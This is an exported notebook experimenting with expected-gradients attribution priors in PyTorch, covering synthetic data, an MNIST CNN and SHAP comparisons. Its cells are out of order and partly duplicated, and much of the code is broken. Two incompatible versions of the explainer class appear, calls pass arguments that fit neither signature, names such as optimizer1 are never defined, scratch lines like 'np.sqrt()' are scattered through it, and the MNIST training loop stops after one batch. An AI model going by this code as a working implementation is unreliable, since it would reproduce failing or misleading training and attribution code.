print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
```
### using shap.GradientExplainer
```
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
```
### using implemented explainer
```
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
```
# MNIST
## download dataset
```
batch_size=50
num_epochs=60
valid_size=5000
train_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.RandomRotation([-15,15], fill = (0,)),
transforms.RandomAffine(degrees=0, translate=(4/28,4/28), fillcolor=0),
transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataset=Subset(train_dataset,range(valid_size,len(train_dataset)))
valid_dataset=torchvision.datasets.MNIST('./data', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
valid_dataset=Subset(valid_dataset,range(valid_size))
test_dataset=torchvision.datasets.MNIST('./data', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean=(0.5,), std=(1,)),
]))
train_dataloader=DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=batch_size)
valid_dataloader=DataLoader(valid_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
test_dataloader=DataLoader(test_dataset, shuffle=False, drop_last=True, batch_size=batch_size)
class MNISTModel(torch.nn.Module):
def __init__(self):
super(MNISTModel,self).__init__()
layer1_conv=torch.nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer1_conv.weight);torch.nn.init.zeros_(layer1_conv.bias);
layer1_batchnorm=torch.nn.BatchNorm2d(num_features=32, momentum=0.1)
layer1_activation=torch.nn.ReLU()
layer1_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer2_conv=torch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, padding=int((5-1)/2));torch.nn.init.xavier_uniform_(layer2_conv.weight);torch.nn.init.zeros_(layer2_conv.bias);
layer2_batchnorm=torch.nn.BatchNorm2d(num_features=64, momentum=0.1)
layer2_activation=torch.nn.ReLU()
layer2_maxpool=torch.nn.MaxPool2d(kernel_size=2, padding=0)
layer3_flatten=torch.nn.Flatten()
layer3_fc=torch.nn.Linear(3136,1024);torch.nn.init.xavier_uniform_(layer3_fc.weight);torch.nn.init.zeros_(layer3_fc.bias);
layer3_activation=torch.nn.ReLU()
layer3_dropout=torch.nn.Dropout(p=0.5)
layer4_fc=torch.nn.Linear(1024, 10)
self.layers=torch.nn.Sequential(layer1_conv, layer1_batchnorm, layer1_activation, layer1_maxpool,
layer2_conv, layer2_batchnorm, layer2_activation, layer2_maxpool,
layer3_flatten, layer3_fc, layer3_activation, layer3_dropout,
layer4_fc)
#print(dir(self.layers))
#print(self.layers._get_name())
def forward(self,x):
x=self.layers(x)
return x
device=torch.device('cuda')
model=MNISTModel().to(device)
len(train_dataset)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
"""
global_step=0
"""
lamb=0.5
explainer=AttributionPriorExplainer(reference_dataset=train_dataset, input_index=0, batch_size=batch_size, k=5)
loss_func=torch.nn.CrossEntropyLoss()
for epoch in range(60):
for i, (images, labels_true) in enumerate(train_dataloader):
images, labels_true = images.to(device), labels_true.to(device)
optimizer.zero_grad()
labels_onehot_pred=model(images)
labels_onehot_true=torch.nn.functional.one_hot(labels_true, num_classes=10)
eg=explainer.attribution(model, images, valid_output=labels_onehot_true)
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
loss=loss_func(labels_onehot_pred, labels_true)
loss.backward(retain_graph=True)
optimizer.step()
"""
global_step+=1
if (global_step*50)%60000==0:
pass
"""
scheduler.step()
break
images.shape, labels_true.shape
eg_standardized=(eg-eg.mean(dim=(-1,-2,-3), keepdim=True))/\
(eg.std(dim=(-1,-2,-3),keepdim=True).clamp(max=1/np.sqrt(torch.numel(eg[0]))))
images.shape
torch.nn.functional.one_hot??
eg_standardized[0].std()
eg[0].mean()
eg[0].std()
np.sqrt()
```
# AttributionPriorExplainer
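The class below follows the expected-gradients formulation used by the linked attributionpriors repository: each attribution is a Monte-Carlo estimate (k interpolation samples per input, drawn from the reference dataset) of

$$
\phi_i(x) = \mathbb{E}_{x' \sim D,\ \alpha \sim U(0,1)}\left[(x_i - x'_i)\,\frac{\partial f\bigl(x' + \alpha (x - x')\bigr)}{\partial x_i}\right].
$$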
```
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
Currently, for one-hot encoded class outputs, attributions are computed only through the true-class output index; the other output indices are ignored.
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, input_index, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
self.input_index=input_index
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
if self.input_index is None:
return reference_data
else:
return reference_data[self.input_index]
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated, valid_output):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
if valid_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=valid_output,
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data, valid_output=None):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated, valid_output)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
"""
if list(batch_output.shape[1:])==[1]:
# scalar output
else:
# vector output
if grad_output is None:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
else:
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=grad_outputs.to(input_reference_interpolated.device),
create_graph=True)[0]
def gather_nd(self,params, indices):
max_value = functools.reduce(operator.mul, list(params.size())) - 1
indices = indices.t().long()
ndim = indices.size(0)
idx = torch.zeros_like(indices[0]).long()
m = 1
for i in range(ndim)[::-1]:
idx += indices[i]*m
m *= params.size(i)
idx[idx < 0] = 0
idx[idx > max_value] = 0
return torch.take(params, idx)
sample_indices=torch.arange(0,batch_output.size(0)).to(input_reference_interpolated.device)
indices_tensor=torch.cat([sample_indices.unsqueeze(1),
sparse_output.unsqueeze(1).to(input_reference_interpolated.device)],dim=1)
batch_output=self.gather_nd(batch_output, indices_tensor)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
print('a',torch.ones_like(batch_output).to(input_reference_interpolated.device).shape)
print('equal',np.all((grad_out==grad_out2).cpu().numpy()))
"""
optimizer1.param_groups[0]['amsgrad']
optimizer2 = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler2 = torch.optim.lr_scheduler.ExponentialLR(optimizer=optimizer2, gamma=0.95)
#scheduler1 = torch.optim.lr_scheduler.StepLR(optimizer1, step_size=5, gamma=0.5)
optimizer2.param_groups[0]['params'][-1]
len(optimizer1.param_groups)
scheduler1.get_last_lr()
scheduler1.step()
optimizer1.param_groups[0]['initial_lr']
optimizer1.param_groups[0]['lr']
test_dataset
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
model(img),model(img).shape
model(img).shape
img.shape
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
for img,label in train_dataloader:
print(img)
break
torch.nn.MaxPool2d(kernel_size=2, padding='valid')
torch.nn.MaxPool2d(kernel_size=2)
train_dataloader=DataLoader(dataset=train_dataset, batch_size=10)
loss_func=torch.nn.CrossEntropyLoss()
for images, labels_true in train_dataloader:
images=images
labels_pred=model.forward(images)
print(labels_pred.shape)
loss_func(labels_pred, labels_true)
import tensorflow as tf
image = tf.constant(np.arange(1, 24+1, dtype=np.int32), shape=[2,2, 2, 3])
new_image = tf.image.per_image_standardization(image)
np.var(new_image[0])
new_image
np.var(new_image)
torch.nn.Dropout?
import torch
torch.nn.Conv2d??
from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout(0.25)
self.dropout2 = nn.Dropout(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = F.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = F.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = F.log_softmax(x, dim=1)
return output
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
if args.dry_run:
break
def test(model, device, test_loader):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
model = Net()
train_loader = torch.utils.data.DataLoader(dataset1,batch_size=64)
test_loader = torch.utils.data.DataLoader(dataset2, batch_size=1000)
device=torch.device('cuda')
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
break
data.shape
def main():
# Training settings
parser = argparse.ArgumentParser(description='PyTorch MNIST Example')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=14, metavar='N',
help='number of epochs to train (default: 14)')
parser.add_argument('--lr', type=float, default=1.0, metavar='LR',
help='learning rate (default: 1.0)')
parser.add_argument('--gamma', type=float, default=0.7, metavar='M',
help='Learning rate step gamma (default: 0.7)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--dry-run', action='store_true', default=False,
help='quickly check a single pass')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=10, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--save-model', action='store_true', default=False,
help='For Saving the current Model')
args = parser.parse_args()
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
device = torch.device("cuda" if use_cuda else "cpu")
train_kwargs = {'batch_size': args.batch_size}
test_kwargs = {'batch_size': args.test_batch_size}
if use_cuda:
cuda_kwargs = {'num_workers': 1,
'pin_memory': True,
'shuffle': True}
train_kwargs.update(cuda_kwargs)
test_kwargs.update(cuda_kwargs)
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset1 = datasets.MNIST('../data', train=True, download=True,
transform=transform)
dataset2 = datasets.MNIST('../data', train=False,
transform=transform)
train_loader = torch.utils.data.DataLoader(dataset1,**train_kwargs)
test_loader = torch.utils.data.DataLoader(dataset2, **test_kwargs)
model = Net().to(device)
optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
for epoch in range(1, args.epochs + 1):
train(args, model, device, train_loader, optimizer, epoch)
test(model, device, test_loader)
scheduler.step()
if args.save_model:
torch.save(model.state_dict(), "mnist_cnn.pt")
```
# AttributionPriorExplainer
```
"""
https://github.com/suinleelab/attributionpriors/blob/master/attributionpriors/pytorch_ops.py
https://github.com/slundberg/shap/blob/master/shap/explainers/_gradient.py
"""
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader
class AttributionPriorExplainer():
def __init__(self, reference_dataset, batch_size, k):
self.reference_dataloader=DataLoader(dataset=reference_dataset,
batch_size=batch_size*k,
shuffle=True,
drop_last=True)
self.reference_dataloader_iterator=iter(self.reference_dataloader)
self.batch_size=batch_size
self.k=k
def get_reference_data(self):
try:
reference_data=next(self.reference_dataloader_iterator)
except:
self.reference_dataloader_iterator=iter(self.reference_dataloader)
reference_data=next(self.reference_dataloader_iterator)
return reference_data
def interpolate_input_reference(self, input_data, reference_data):
alpha=torch.empty(self.batch_size, self.k).uniform_(0,1).to(input_data.device)
alpha=alpha.view(*([self.batch_size, self.k,]+[1]*len(input_data.shape[1:])))
input_reference_interpolated=(1-alpha)*reference_data+(alpha)*input_data.unsqueeze(1)
return input_reference_interpolated
def diff_input_reference(self, input_data, reference_data):
return input_data.unsqueeze(1)-reference_data
def get_grad(self, model, input_reference_interpolated):
input_reference_interpolated.requires_grad=True
input_reference_interpolated_grad=torch.zeros(input_reference_interpolated.shape).float().to(input_reference_interpolated.device)
for i in range(self.k):
batch_input=input_reference_interpolated[:,i,]
batch_output=model(batch_input)
grad_out=grad(outputs=batch_output,
inputs=batch_input,
grad_outputs=torch.ones_like(batch_output).to(input_reference_interpolated.device),
create_graph=True)[0]
input_reference_interpolated_grad[:,i,]=grad_out
return input_reference_interpolated_grad
def attribution(self, model, input_data):
model_dtype=next(model.parameters()).dtype
reference_data=self.get_reference_data().to(model_dtype).to(input_data.device)
assert input_data.dtype==model_dtype
assert input_data.shape[0]==self.batch_size
assert input_data.shape[1:]==reference_data.shape[1:]
assert input_data.device==next(model.parameters()).device
reference_data=reference_data.view(self.batch_size, self.k, *reference_data.shape[1:])
input_reference_interpolated=self.interpolate_input_reference(input_data, reference_data)
input_reference_diff=self.diff_input_reference(input_data, reference_data)
input_reference_interpolated_grad=self.get_grad(model, input_reference_interpolated)
diff_interpolated_grad=input_reference_diff*input_reference_interpolated_grad
expected_grad=diff_interpolated_grad.mean(axis=1)
return expected_grad
```
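A minimal usage sketch for the explainer above (the `model`, `train_dataset` and batch `x` here are placeholders, not objects defined in this notebook):
```
# Hypothetical setup: a differentiable `model`, a Dataset used as the reference/background
# distribution, and an input batch `x` of shape (batch_size, ...) taken from a DataLoader.
explainer = AttributionPriorExplainer(reference_dataset=train_dataset, batch_size=64, k=1)
eg = explainer.attribution(model, x)   # expected-gradients attribution, same shape as x
penalty = eg.abs().mean()              # can be added to the task loss as an attribution prior
```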
```
dir_of_file='MyDrive/Colab Notebooks/attributionpriors/examples'
from google.colab import drive
import os
drive.mount('./gdrive')
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
# Change the current working directory
os.chdir('./gdrive/'+dir_of_file)
# Print the current working directory
print("Current working directory: {0}".format(os.getcwd()))
import pkg_resources
if 'shap' not in [i.key for i in pkg_resources.working_set]:
!pip install shap
import sys
sys.path.insert(0, '../')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import altair as alt
import torch
from torch.autograd import grad
from torch.utils.data import Dataset, DataLoader, Subset
from torch.utils.data.dataset import random_split
import torchvision
from torchvision import transforms
import shap
class BinaryData(Dataset):
def __init__(self, X, y=None, transform=None):
self.X=X
self.y=y
self.transform=transform
def __len__(self):
return len(self.X)
def __getitem__(self, index):
sample=self.X[index,:]
if self.transform is not None:
sample=self.transform(sample)
if self.y is not None:
return sample, self.y[index]
else:
return sample
batch_size=64
a_train=torch.empty(1000,1).uniform_(0,1)
x_train=torch.bernoulli(a_train)
x_train=torch.cat([x_train,x_train],axis=1)
y_train=x_train[:,0]
train_dataset=BinaryData(x_train, y_train)
train_loader=DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
#a_test=torch.empty(1000,2).uniform_(0,1)
#x_test=torch.bernoulli(a_test)
#y_test=x_test[:,0]
#test_dataset=BinaryData(x_test, y_test)
#test_loader=DataLoader(dataset=test_dataset, batch_size=64, shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
def calculate_dependence(model):
zero_arange=torch.tensor(np.concatenate([np.zeros(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
one_arange=torch.tensor(np.concatenate([np.ones(100).reshape(-1,1),
np.arange(0,1,0.01).reshape(-1,1)],axis=1)).float().to(device)
arange_zero=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.zeros(100).reshape(-1,1)],axis=1)).float().to(device)
arange_one=torch.tensor(np.concatenate([np.arange(0,1,0.01).reshape(-1,1),
np.ones(100).reshape(-1,1)],axis=1)).float().to(device)
dep1=(model(one_arange)-model(zero_arange)).mean().detach().cpu().numpy().reshape(-1)[0]
dep2=(model(arange_one)-model(arange_zero)).mean().detach().cpu().numpy().reshape(-1)[0]
return dep2/dep1, dep1, dep2
device=torch.device('cuda')
convergence_list1_list_eg=[]
convergence_list2_list_eg=[]
convergence_list3_list_eg=[]
for k in [1,2,3,4,5]:
print('k =',k)
model=MLP().to(device)
with torch.no_grad():
model.layers[0].weight[0,0]=10
model.layers[0].weight[0,1]=10
model.layers[0].bias[0]=-6
x_zeros = torch.ones_like(x_train[:,:])
background_dataset = BinaryData(x_zeros)
explainer = AttributionPriorExplainer(background_dataset, None, 64, k=k)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)
bce_term = torch.nn.BCELoss()
train_loss_list_mean_list=[]
convergence_list1=[]
convergence_list2=[]
convergence_list3=[]
for epoch in range(200):
train_loss_list=[]
for i, (x, y_true) in enumerate(train_loader):
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
eg_abs_mean=eg.abs().mean(0)
loss=bce_term(y_pred, y_true.unsqueeze(1)) + eg_abs_mean[1]
loss.backward(retain_graph=True)
optimizer.step()
train_loss_list.append(loss.item())
train_loss_list_mean=np.mean(train_loss_list)
train_loss_list_mean_list.append(train_loss_list_mean)
convergence_list1.append(calculate_dependence(model)[0])
convergence_list2.append(calculate_dependence(model)[1])
convergence_list3.append(calculate_dependence(model)[2])
convergence_list1_list_eg.append(convergence_list1)
convergence_list2_list_eg.append(convergence_list2)
convergence_list3_list_eg.append(convergence_list3)
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1), convergence_list1,label=k+1)
plt.xlim([40,75])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('epochs')
plt.ylabel('fractional dependence on feature 2')
plt.show()
plt.figure(figsize=(6,6))
for k, convergence_list1 in enumerate(convergence_list1_list_eg):
plt.plot((np.arange(len(convergence_list1))+1)*(k+1), convergence_list1,label=k+1)
plt.xlim([0,350])
plt.ylim([-0.01,0.4])
plt.legend(title='k')
plt.xlabel('gradient calls per training example')
plt.ylabel('fractional dependence on feature 2')
plt.show()
feature_mean=0
feature_sigma=1
dummy_sigma=0.5
n_samples=1000
n_features=3
X=np.random.randn(n_samples,n_features)*feature_sigma+feature_mean
X[:,2]=X[:,0]+np.random.randn(n_samples)*dummy_sigma
output_mean=0
output_sigma=0.5
Y=X[:,0]-X[:,1]+np.random.randn(n_samples)*output_sigma+output_mean
Y=Y.reshape([Y.shape[0],1])
data = pd.DataFrame({'Feature 0': X[:, 0], 'Feature 1': X[:, 1], 'Feature 2': X[:, 2], 'Outcome': Y.squeeze()})
alt.Chart(data).mark_point(filled=True).encode(
x=alt.X(alt.repeat('column'), type='quantitative', scale=alt.Scale(domain=[-4, 4])),
y=alt.Y('Outcome:Q', scale=alt.Scale(domain=[-6, 6]))
).properties(
height=200,
width=200
).repeat(
column=['Feature 0', 'Feature 1', 'Feature 2']
).properties(
title='The relationship between the outcome and the three features in our simulated data'
).configure_axis(
labelFontSize=15,
labelFontWeight=alt.FontWeight('lighter'),
titleFontSize=15,
titleFontWeight=alt.FontWeight('normal')
).configure_title(
fontSize=18
)
class CustomDataset(Dataset):
def __init__(self, x, y=None):
self.x=x
self.y=y
def __len__(self):
return len(self.x)
def __getitem__(self, index):
if self.y is not None:
return self.x[index], self.y[index]
else:
return self.x[index]
batch_size=20
dataset=CustomDataset(x=X,y=Y)
train_dataset, test_dataset, valid_dataset=random_split(dataset, [int(n_samples*0.8), int(n_samples*0.1), int(n_samples*0.1)])
train_dataloader=DataLoader(dataset=train_dataset, batch_size=20, shuffle=True, drop_last=True)
test_dataloader=DataLoader(dataset=test_dataset, batch_size=len(test_dataset), shuffle=True, drop_last=True)
valid_dataloader=DataLoader(dataset=valid_dataset, batch_size=len(valid_dataset), shuffle=True, drop_last=True)
class MLP(torch.nn.Module):
def __init__(self):
super(MLP,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(2,1),
torch.nn.Sigmoid())
def forward(self,x):
x=self.layers(x)
return x
class CustomModel(torch.nn.Module):
def __init__(self):
super(CustomModel,self).__init__()
self.layers=torch.nn.Sequential(torch.nn.Linear(n_features,5),
torch.nn.ReLU(),
torch.nn.Linear(5,1))
def forward(self, x):
return self.layers(x)
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset[:][0], None, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset[:][0], None, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true) + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
shap_values=explainer.shap_values(torch.Tensor(X).to(device), nsamples=200)
shap.summary_plot(shap_values, X)
explainer_temp = AttributionPriorExplainer(dataset, input_index=0, batch_size=5, k=200)
temp_dataloader=DataLoader(dataset=dataset, batch_size=5, shuffle=True, drop_last=True)
eg_list=[]
x_list=[]
for i, (x, y_true) in enumerate(temp_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
eg_temp=explainer_temp.attribution(model, x)
eg_list.append(eg_temp.detach().cpu().numpy())
x_list.append(x.detach().cpu().numpy())
eg_list_concat=np.concatenate(eg_list)
x_list_concat=np.concatenate(x_list)
shap.summary_plot(eg_list_concat, x_list_concat)
device=torch.device('cuda')
model=CustomModel().to(device)
explainer = AttributionPriorExplainer(train_dataset, input_index=0, batch_size=batch_size, k=1)
explainer_valid = AttributionPriorExplainer(valid_dataset, input_index=0, batch_size=100, k=1)
optimizer=torch.optim.SGD(model.parameters(), lr=1e-2, momentum=0, dampening=0)
loss_func = torch.nn.MSELoss()
batch_count=0
valid_loss_list=[]
step_list=[]
for epoch in range(15):
for i, (x, y_true) in enumerate(train_dataloader):
batch_count+=1
x, y_true= x.float().to(device), y_true.float().to(device)
optimizer.zero_grad()
y_pred=model(x)
eg=explainer.attribution(model, x)
loss=loss_func(y_pred, y_true)# + 30*(eg*eg)[:,2].mean()
loss.backward()
optimizer.step()
if batch_count%10==0:
valid_loss=[]
for i, (x, y_true) in enumerate(valid_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
valid_loss.append(loss.item())
eg=explainer_valid.attribution(model,x)
#print(eg.abs().mean(axis=0).detach().cpu())
valid_loss_list.append(np.mean(valid_loss))
step_list.append(batch_count)
test_loss=[]
for i, (x, y_true) in enumerate(test_dataloader):
x, y_true= x.float().to(device), y_true.float().to(device)
y_pred = model(x)
loss=loss_func(y_pred, y_true)
test_loss.append(loss.item())
print('MSE:',np.mean(test_loss))
data = pd.DataFrame({
'Iteration': step_list,
'Validation Loss': valid_loss_list
})
alt.Chart(data
).mark_line().encode(alt.X('Iteration:Q'), alt.Y('Validation Loss:Q', scale=alt.Scale(domain=[0.0, 2.5])))
explainer=shap.GradientExplainer(model=model, data=torch.Tensor(X).to(device))
